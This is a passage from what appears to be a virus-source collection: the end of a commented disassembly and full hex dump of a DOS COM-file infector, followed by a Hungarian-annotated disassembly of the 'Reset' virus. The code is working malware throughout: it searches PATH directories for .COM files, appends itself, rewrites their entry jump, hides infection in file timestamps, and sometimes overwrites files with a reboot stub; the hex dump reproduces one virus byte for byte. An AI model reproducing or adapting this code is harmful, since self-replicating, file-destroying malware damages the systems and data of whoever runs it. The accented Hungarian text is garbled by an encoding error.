0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
;Az Łj fileon bel<65>li adatter<65>let cˇmnek kisz mˇt sa s be l-
;lˇt sa:
0277 81C1F902 ADD CX,02F9 ;CX az Łj fileon bel<65>li adatter<65>-
027B 8BFE MOV DI,SI ;letre mutat.
027D 81EFF701 SUB DI,01F7 ;A vˇrus els” utasˇt s nak (MOV DX,
;02F9) operandus nak cˇme.
0281 890D MOV [DI],CX ;Ide ˇrja az adatter<65>let cˇmt
;-----------------------------------------
; A vˇrus hozz m solja mag t a filehoz:
;-----------------------------------------
;(A filemutat˘ a file vgre mutat.)
0283 B440 MOV AH,40 ;Ir s fileba.
0285 B93603 MOV CX,0336 ;822 byte (a vˇrus hossza)
0288 8BD6 MOV DX,SI
028A 81EAF901 SUB DX,01F9 ;DX a vˇrus els” bytej ra mutat
028E CD21 INT 21
0290 721F JB 02B1 ;Hib n l vge
0292 3D3603 CMP AX,0336
0295 751A JNZ 02B1 ;Ha nem ˇrta ki mind a 648 byteot
;Az els” 3 byte  t llˇt sa, egy a file vgre mutat˘ ugr˘ uta-
;sˇt sra:
0297 B80042 MOV AX,4200 ;A file pointer a file elejre!
029A B90000 MOV CX,0000
029D BA0000 MOV DX,0000
02A0 CD21 INT 21
02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
02A4 B440 MOV AH,40 ;Ir s fileba
02A6 B90300 MOV CX,0003 ;3 byte
02A9 8BD6 MOV DX,SI
02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr˘ utasˇt sra
02AF CD21 INT 21 ;mutat
;Az eredeti id” ( m r a fert”zsjelzssel egy<67>tt ) vissza llˇ-
;t sa:
02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
02BD 81C91F00 OR CX,001F ;M r volt fert”zve jelzs
02C1 B80157 MOV AX,5701 ;Set Date & Time
02C4 CD21 INT 21
;A file lez r sa:
02C6 B43E MOV AH,3E ;Close Handle
02C8 CD21 INT 21
;Az eredeti attributtum vissza llˇt sa:
02CA B80143 MOV AX,4301 ;Set File Attributtum
02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
02D1 BA1F00 MOV DX,001F
02D4 90 NOP
02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
02D7 CD21 INT 21
;DTA vissza llˇt sa az eredeti cˇmre:
02D9 1E PUSH DS
02DA B41A MOV AH,1A ;Set DTA
02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
02E4 CD21 INT 21
02E6 1F POP DS
;-----------------------------------------
; Az eredeti program futtat sa:
;-----------------------------------------
02E7 59 POP CX ;CX vissza llˇt sa
02E8 33C0 XOR AX,AX ;Regiszterek null z sa
02EA 33DB XOR BX,BX
02EC 33D2 XOR DX,DX
02EE 33F6 XOR SI,SI
02F0 BF0001 MOV DI,0100
02F3 57 PUSH DI ;0100 a stackre
02F4 33FF XOR DI,DI
02F6 C2FFFF RET FFFF ;100-on folytat˘dik a vezrls
;SP-- {Hogy minek?}
;-----------------------------------------
; ADAT TERšLET
;-----------------------------------------
;Ide mutat (02F9-re) a vˇrus elejn DX, ks”bb SI,BX.
02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cˇme
02FB ERE_DTA_SEG DW (?) ;[SI+02]
02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
02FF ERE_DATE DW (?) ;[SI+06] d tuma,
0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
;A file eredeti els” 3 byteja.
;A k”vetkez” 3 byteon lesz az a 3 byte , amit a vˇrus egy meg-
;fert”zend” file elejre fog ˇrni.
0306 B_JMP DB E9 ;[SI+0D]
;JMP gpik˘dja
0307 CIM_JMP DW (?) ;Eltol s (JMP operandusa)
0309 KERES_STR DB '*.COM',0 ;[SI+10]
;Ezt a stringet m solja a
;FILE_NEV_MUT cˇmre
030F PATH_MUT DW (?) ;[SI+16]
;Hol a k”vetkez” aldirectory neve
;az environmenten.
0311 FILE_NEV_MUT DW (?) ;[SI+18]
;Az  tm solt aldirectory m”g mu-
;tat.
;Azt mutatja , hogy hova kell a
;keressi stringet(*.COM), majd a
;file nevt m solni a FILE_PATH-
;on bel<65>l ahhoz, hogy teljes utat
;kapjunk.
0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
;environment ter<65>leten.
0318 FILE_PATH DB 40 DUP (?);[SI+1F]
;Itt lesz majd a keressi string
;s a fert”zend” file neve Łttal
;egy<67>tt.
;Ide mutat a DTA. Ezt a ter<65>letet fogja a DOS a file adataival
;felt”lteni.
0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
036D ENT_ATTR DB (?) ;Attributtum [SI+74]
036E ENT_IDO DW (?) ;Keletkezs ideje [SI+75]
0370 ENT_DATUM DW (?) ;Keletkezs d tuma [SI+77]
0372 ENT_HOSSZ DW (?) ;Als˘ sz˘ [SI+79]
0374 DW (?) ;Fels” sz˘ [SI+7B]
0376 ENT_NEV DB 0D DUP (?);Megtal lt file neve [SI+7D]
0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
;Nem haszn lja
;----------------------------------------------------
; A T”lt”get”t behŁz˘ rsz
;----------------------------------------------------
0388 50 PUSH AX ;Regiszterek elmentse
0389 53 PUSH BX
038A 51 PUSH CX
038B 52 PUSH DX
038C 06 PUSH ES
038D 1E PUSH DS
038E 57 PUSH DI
038F 56 PUSH SI
0390 E80000 CALL 0393 ;Lebuk s !! (/g)
0393 5B POP BX ;BX=0393
;A: BOOT beolvas sa/T”lt”get” lekrdezse
0394 BEA55A MOV SI,5AA5 ;T”lt”get” lekrdezse
0397 BFAA55 MOV DI,55AA
039A 0E PUSH CS
039B 07 POP ES
039C 81C3E803 ADD BX,03E8 ;BX=077B
03A0 81FBE803 CMP BX,03E8
03A4 7303 JNB 03A9
03A6 E98200 JMP 042B ;Ha nincs elg szabad mem˘ria a szegmensen
03A9 53 PUSH BX
03AA B80102 MOV AX,0201 ;A:BOOT beolvas sa
03AD BA0000 MOV DX,0000
03B0 B90100 MOV CX,0001
03B3 CD13 INT 13
03B5 5B POP BX
03B6 7308 JNB 03C0
03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
03BB 74EC JZ 03A9
03BD EB6C JMP 042B ;Val˘di hiba->vge
03BF 90 NOP
03C0 81FE5AA5 CMP SI,A55A
03C4 7465 JZ 042B ;Vge, ha a T”lt”get” m r a mem˘ri ban van
;Van-e elg szabad mem˘ria a T”lt”get” beolvas s hoz
03C6 8CC8 MOV AX,CS
03C8 050010 ADD AX,1000
03CB 53 PUSH BX
03CC 50 PUSH AX
03CD CD12 INT 12 ;Max mem.
03CF BB4000 MOV BX,0040
03D2 F7E3 MUL BX ;AX-ben a mem˘ria tetejnek szegmense
03D4 2D0010 SUB AX,1000 ;legal bb 4Kb kell a T”lt”get”nek
03D7 8BD8 MOV BX,AX
03D9 58 POP AX ;CS+1000
03DA 3BD8 CMP BX,AX
03DC 7304 JNB 03E2
03DE 5B POP BX
03DF EB4A JMP 042B ;Vge, ha nincs elg szabad mem˘ria
03E1 90 NOP
; A lemez ut˘ls˘ s vj nak megkeresse
03E2 5B POP BX ;BX=077B
03E3 8EC0 MOV ES,AX ;Max mem-1000
03E5 2E CS:
03E6 8B4718 MOV AX,[BX+18] ;S v hossza
03E9 2E CS:
03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak sz ma
03ED F7E1 MUL CX
03EF 8BC8 MOV CX,AX ;Egy cilinder nagys ga
03F1 2E CS:
03F2 8B4713 MOV AX,[BX+13] ;Szektorok sz ma
03F5 BA0000 MOV DX,0000
03F8 F7F1 DIV CX ;Osztva a cilinder nagys g val AL-ben a s v
; Az ut˘ls˘ s v beolvas sa
03FA 81EBE803 SUB BX,03E8 ;BX=0393
03FE 53 PUSH BX
03FF 8AE8 MOV CH,AL ;40/80-dik s v
0401 B101 MOV CL,01
0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
0406 BA0000 MOV DX,0000
0409 B80802 MOV AX,0208 ;8 szektor beolvas sa
040C CD13 INT 13
040E 5B POP BX
040F 721A JB 042B ;Hib n l vge
; Ha a T”lt”get”t tal l, elindˇtja
0411 53 PUSH BX
0412 BB0001 MOV BX,0100
0415 26 ES:
0416 8B07 MOV AX,[BX]
0418 3D5224 CMP AX,2452 ;Azonosˇt˘
041B 5B POP BX
041C 750D JNZ 042B ;Ha nem T”lt”get”
041E 8BC3 MOV AX,BX
0420 059800 ADD AX,0098 ;AX=042B (A visszatrsre mutat)
0423 0E PUSH CS
0424 50 PUSH AX
0425 B80A01 MOV AX,010A ;T”lt”get” belpsi pontja
0428 06 PUSH ES
0429 50 PUSH AX
042A CB RETF
; Visszatrs
042B 5E POP SI ;Regiszterek vissza
042C 5F POP DI
042D 1F POP DS
042E 07 POP ES
042F 5A POP DX
0430 59 POP CX
0431 5B POP BX
0432 58 POP AX
0433 C3 RET
0434 0000 DW 0000 ;???
A vˇrus hexa dumpja :
0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
0430 59 5B 58 C3 00 00 Y[X...


571
MSDOS/Virus.MSDOS.Unknown.v_dos625.asm Normal file
View File

@ -0,0 +1,571 @@
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
(41) 21-033
Unassemble list:
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
114E:0103 49 DEC CX
114E:0104 60 DB 60
114E:0105 61 DB 61
114E:0106 6D DB 6D
114E:0107 206120 AND [BX+DI+20],AH
114E:010A 52 PUSH DX
114E:010B 65 DB 65
114E:010C 7365 JNB 0173
114E:010E 7420 JZ 0130
114E:0110 56 PUSH SI
114E:0111 49 DEC CX
114E:0112 52 PUSH DX
114E:0113 55 PUSH BP
114E:0114 53 PUSH BX
114E:0115 2124 AND [SI],SP
114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
;program kezdete
114E:011A B409 MOV AH,09
114E:011C CD21 INT 21 ;uzenet kepernyore
114E:011E B400 MOV AH,00
114E:0120 CD20 INT 20 ;exit to DOS
114E:0122 51 PUSH CX ;stack-en marad
;a kovetkezo utasitas operandusat fertozeskor
;allitja be, igy mindig a helyes cimre mutat
114E:0123 BA1B03 MOV DX,031B
114E:0126 FC CLD ;elore
114E:0127 8BF2 MOV SI,DX
114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
114E:012D BF0001 MOV DI,0100 ;program eleje
114E:0130 B90300 MOV CX,0003 ;3 byte
114E:0133 F3 REPZ
114E:0134 A4 MOVSB ;eredeti JMP 117
;visszamasolasa
114E:0135 8BF2 MOV SI,DX
114E:0137 B430 MOV AH,30
114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
114E:013B 3C00 CMP AL,00
114E:013D 7503 JNZ 0142
114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
;nem fertoz a virus s
;futtatja az eredeti
;programot
114E:0142 06 PUSH ES
114E:0143 B42F MOV AH,2F
114E:0145 CD21 INT 21 ;DTA. lekerdezese
114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
114E:014F 07 POP ES
;DTA. beallitasa az ENTRY cimere /dir.-bol/
;ide masolja a find first a file adatait
114E:0150 BA5F00 MOV DX,005F ;DX=037a
114E:0153 90 NOP
114E:0154 03D6 ADD DX,SI
114E:0156 B41A MOV AH,1A
114E:0158 CD21 INT 21 ;DTA. letrehozasa
;037a-tol uj cimre
114E:015A 06 PUSH ES
114E:015B 56 PUSH SI
114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
;kovetkezo dir.-ra mu-
;tatni
114E:0163 5E POP SI
114E:0164 56 PUSH SI
114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
;stringet keresi a
;kornyezetbe PATH
114E:0169 AC LODSB ;AL=DS:[SI],SI++
114E:016A B90080 MOV CX,8000 ;32 kbyte
114E:016D F2 REPNZ
114E:016E AE SCASB ;megkeresi a kovetke-
;zo P betut
114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
114E:0172 AC LODSB
114E:0173 AE SCASB ;betunkent hasonlitja
114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
;karakter /kov.betu/
114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
;osszehasonlitja a tobbi
;betut is
114E:0178 5E POP SI
114E:0179 07 POP ES ;ES:DI mutat az elso
;PATH-ra
114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
;spec. cimenek mentese
;PATH mutato
114E:017E 8BFE MOV DI,SI ;SI=031b
114E:0180 81C71F00 ADD DI,001F ;DI=033a
114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
;tat az adatokra
114E:0186 81C61F00 ADD SI,001F ;SI=033a
114E:018A 8BFE MOV DI,SI ;DI=033a
114E:018C EB3A JMP 01C8
;A kovetkezo PATH-ban megadott aldirectoryt
;File Path-ra masolja, igy a kovetkezo file-t
;ebben az aldirectoryban keresi
114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
114E:0193 7503 JNZ 0198
114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
114E:0198 1E PUSH DS
114E:0199 56 PUSH SI
114E:019A 26 ES:
114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
114E:019F 8BFE MOV DI,SI ;DI=033a
114E:01A1 26 ES:
114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
;masolasa ha az aktualis
;konyvtarban nem talalt
;fertozheto file-t
;a PATH= utanra mutat
;az SI
114E:01A6 81C71F00 ADD DI,001F
114E:01AA AC LODSB ;beolvas a kornyezetbol
;a 0029. byte-ot
114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
114E:01AD 740A JZ 01B9 ;igen
114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
;tobb
114E:01B1 7403 JZ 01B6 ;igen
114E:01B3 AA STOSB ;letarol 033a-tol
114E:01B4 EBF4 JMP 01AA
114E:01B6 BE0000 MOV SI,0000
114E:01B9 5B POP BX ;BX=regi SI BX mutat
;az adatokra
114E:01BA 1F POP DS
114E:01BB 89B71600 MOV [BX+0016],SI
;a kovetkezo PATH-ban adott dir. mar atmasolva
114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
114E:01C3 7403 JZ 01C8 ;igen
114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
;egy aldir. kiertekelese, eloszor az aktualis, majd
;a file path -ra masolt aldir. vegignezese, fertozes
;DI a file path-ba irt aldir. neve utani poz.-ra mu-
;tat
;COM file keresese
114E:01C7 AA STOSB ;\ jel beirasa
114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
;file nevet masolni,
;az aldir. neve utan
114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
114E:01CE 81C61000 ADD SI,0010 ;SI=032b
114E:01D2 B90600 MOV CX,0006
114E:01D5 F3 REPZ
114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
;a PATH= szoveg utan
114E:01D7 8BF3 MOV SI,BX
114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
;alltal foglalt teru-
;letre
114E:01DB BA1F00 MOV DX,001F
114E:01DE 90 NOP
114E:01DF 03D6 ADD DX,SI
114E:01E1 B90300 MOV CX,0003
114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
;resese, az it. aktivi-
;zalasa utan felhozza a
;filemeretet, attrib.ot
;keletkezes datumat s
;idejet is!
114E:01E6 EB04 JMP 01EC ;vizsgalatra
114E:01E8 B44F MOV AH,4F
114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
;zes keresese
114E:01EC 7302 JNB 01F0 ;ha nincs hiba
114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
;talal tobb COM file-t
;mas aldirt keres
;mar talalt COM file-t, az adataival az entry fel
;van toltve, a file ellenorzese es fertozese
;kovetkezik
114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
;SI=0390
114E:01F4 241F AND AL,1F ;maszk 31 -el
114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
;zott a file!
114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
;file-t keresi
114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
114E:0200 77E6 JA 01E8 ;ha > a file meret
;64000 byte-nal
114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
114E:0207 72DF JB 01E8 ;ha < 10 byte nal
114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
;megvan a kivalasztott file
;a file nevet a filespec utan kell masolni
114E:020D 56 PUSH SI ;DI mutat a filespec.re,
;PATH=*.COM
114E:020E 81C67D00 ADD SI,007D ;SI=0398
114E:0212 AC LODSB ;atmasolja a filenevet
;/megkeresett elso v.
;x.edik bejegyzest/
114E:0213 AA STOSB
114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
;zaro nullaig masol
114E:0216 75FA JNZ 0212 ;nem
114E:0218 5E POP SI ;SI ujra az adatokra mu-
;tat
;a file egyes eredeti informacioinak megorzese
;hogy a fertozese ne tunjon fel
;minek a file ATTR. megegyszer lekerdezni?
114E:0219 B80043 MOV AX,4300
114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
114E:021F 90 NOP
114E:0220 03D6 ADD DX,SI ;DX=031b
114E:0222 CD21 INT 21 ;attributum lekerdezese
;7.6.5.4.3.2.1.0.
;x x a d v s h r
114E:0224 898C0800 MOV [SI+0008],CX ;attributum
114E:0228 B80143 MOV AX,4301
114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
;ra valtoztatja
114E:022F BA1F00 MOV DX,001F
114E:0232 90 NOP
114E:0233 03D6 ADD DX,SI ;DX=033a
114E:0235 CD21 INT 21 ;attributum beallitasa
;file nyitasa
114E:0237 B8023D MOV AX,3D02
114E:023A BA1F00 MOV DX,001F
114E:023D 90 NOP
114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
114E:0240 CD21 INT 21 ;file nyitasa I/O ra
114E:0242 7303 JNB 0247
114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
;fertozes
114E:0247 8BD8 MOV BX,AX ;handle
;a file idejenek lekerdezese de ez is megtalalhato az
;ENTRY teruleten
114E:0249 B80057 MOV AX,5700
114E:024C CD21 INT 21 ;file letrehozasi datum
;es ido bekerese
114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
DH-sec DL-1/100
114E:0252 89940600 MOV [SI+0006],DX ;datum
114E:0256 B42C MOV AH,2C
114E:0258 CD21 INT 21 ;rendszerido bekerese
;annak eldontese hogy a filet tonkretegye-e
;ha a masodperc 7 akkor tonkreteszi /aktualis/
114E:025A 80E607 AND DH,07 ;sec = 7 ?
114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
;file tonkretetele
114E:025F B440 MOV AH,40
114E:0261 B90500 MOV CX,0005
114E:0264 8BD6 MOV DX,SI ;reset
114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
114E:026A CD21 INT 21 ;file elejere ir 5 byte
;-ot a RESET re ugrast!
114E:026C EB65 JMP 02D3
114E:026E 90 NOP
;fertozes
;az eredeti 3 byte megorzese hogy kesobb meg futtatni
;lehessen
114E:026F B43F MOV AH,3F
114E:0271 B90300 MOV CX,0003
114E:0274 BA0A00 MOV DX,000A
114E:0277 90 NOP
114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
114E:027A CD21 INT 21 ;a program eredeti elso
;3 byte-jat beolvassa
114E:027C 7255 JB 02D3 ;ha hiba van
114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
114E:0281 7550 JNZ 02D3 ;nem
;file vegere allas az uj cimek kiszamitasa
114E:0283 B80242 MOV AX,4202
114E:0286 B90000 MOV CX,0000
114E:0289 BA0000 MOV DX,0000
114E:028C CD21 INT 21 ;file vegere pozicional
114E:028E 7243 JB 02D3 ;ha hiba volt -nem
;nagyon lehet hiba!
;file elejere irando JMP operandus kiszamitasa
114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
;utasitashoz amit a
;file elejere fog irni
;igy a JMP a file mos-
;tani vege utani bytera
;fog mutatni
114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
;az uj file-on beluli adatterulet cimenek ki-
;szamitasa es beallitasa
114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
;adatteruletre mutat
114E:029D 8BFE MOV DI,SI
114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
;nak operandusanak
;cime
114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
;cimet
;file moge masolja magat
;filemutato a file vegere mutat
114E:02A5 B440 MOV AH,40
114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
;mutat
114E:02AC 81EAF901 SUB DX,01F9
114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
;program a fertozendo
;program moge irja
114E:02B2 721F JB 02D3 ;hiba eseten
114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
114E:02B7 751A JNZ 02D3 ;igen
;az elso 3 byte atallitasa, egy file
;vegere mutato ugro utasitasra
114E:02B9 B80042 MOV AX,4200
114E:02BC B90000 MOV CX,0000
114E:02BF BA0000 MOV DX,0000
114E:02C2 CD21 INT 21 ;file pointer a vegere
114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
;het hiba!
114E:02C6 B440 MOV AH,40
114E:02C8 B90300 MOV CX,0003
114E:02CB 8BD6 MOV DX,SI
114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
;mutat
114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
;az eredeti ido -mar a fertozesjelzessel egyutt-
;visszaallitasa
114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
;jelzi hogy mar ferto-
;zott egy file a SEC.
;-et 31-re allitja a
;file bejegyzesben
; hour | min. | sec.
;1111 1|111 111|0 0000
114E:02E3 B80157 MOV AX,5701
114E:02E6 CD21 INT 21 ;file keletk. ido beall.
;file zarasa
114E:02E8 B43E MOV AH,3E
114E:02EA CD21 INT 21 ;file zarasa
;eredeti attributum visszaallitasa
114E:02EC B80143 MOV AX,4301
114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./
114E:02F3 BA1F00 MOV DX,001F
114E:02F6 90 NOP
;DTA. visszaallitasa az eredeti cimre
114E:02F7 03D6 ADD DX,SI
114E:02F9 CD21 INT 21 ;file attr. beallitasa
114E:02FB 1E PUSH DS
114E:02FC B41A MOV AH,1A
114E:02FE 8B940000 MOV DX,[SI+0000]
114E:0302 8E9C0200 MOV DS,[SI+0002]
114E:0306 CD21 INT 21 ;DTA. megadasa
114E:0308 1F POP DS
;az eredeti program futtatasa
114E:0309 59 POP CX
114E:030A 33C0 XOR AX,AX ;reg. nullazasa
114E:030C 33DB XOR BX,BX
114E:030E 33D2 XOR DX,DX
114E:0310 33F6 XOR SI,SI
114E:0312 BF0001 MOV DI,0100
114E:0315 57 PUSH DI ;elteszi a 0100 offsetet
;hogy a RET elo tudja
;venni es odaugrik
114E:0316 33FF XOR DI,DI
114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset-
;re, ott mar az eredeti
;JMP 117 utasitas van,
;igy vegrehajtodik az
;eredeti prg.
;SP- hogy minek ?
114E:031B 800046 ADD BYTE PTR [BX+SI],46
114E:031E 0D2001 OR AX,0120
114E:0321 2100 AND [BX+SI],AX
114E:0323 2000 AND [BX+SI],AL
114E:0325 EB15 JMP 033C
114E:0327 90 NOP
114E:0328 E91F00 JMP 034A
114E:032B 2A2E434F SUB CH,[4F43]
114E:032F 4D DEC BP
114E:0330 0028 ADD [BX+SI],CH
114E:0332 004703 ADD [BX+03],AL
114E:0335 50 PUSH AX
